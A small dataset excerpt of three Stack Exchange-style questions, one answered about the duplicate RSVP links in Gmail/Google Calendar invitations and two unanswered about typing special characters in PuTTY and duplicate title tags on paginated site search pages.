_webapps.45376 | When I receive an e-mail invitation via Google Apps, there are two places where it asks if I'm going, and I'm never sure which one to click (see screenshot). Does it matter which one I click? What's the difference, and why does it always ask twice? | Which set of response links should I use when responding to a meeting invitation in Gmail/Google Apps Email? | gmail;google apps email | There is no difference. The reason there are 2 is because top response is a Gmail add-on that recognizes a Google Calendar invitation, and then displays a Calendar widget to make it easier for you to reply.The second is the actual invitation email message, which does include RSVP links in the body text. The reason you see both is just that Gmail will add the widget automatically. If you invite a non-Gmail user, they will only see the email body text, and will have to use those links.My personal preference is to use the top links for 2 reasons:Clicking on the top link will highlight the RSVP selection in bold and will remember the choice if you open the email again. It's also more convenient to view your agenda as you respond.Clicking on the top link will let you respond in the email itself quickly and let you move on to other email. Clicking the bottom link will open a new tab and take you to Calendar, which is inconvenient when all I want to do is respond quickly and be done with it. I get no new information when forced into Calendar. |
_unix.189782 | I am having trouble accessing a folder with a very long name with in its name.seems like every time I try to input the putty window is not parsing the character successfully.Any ideas? | putty does not allow me to input special chars | centos;putty | null |
_webmaster.107844 | Google Search Console shows me my site search page duplicate Title Tag, | How can I avoid site search page duplicate title tag error in pagination of site search? | google search console;web crawlers;webmaster | null |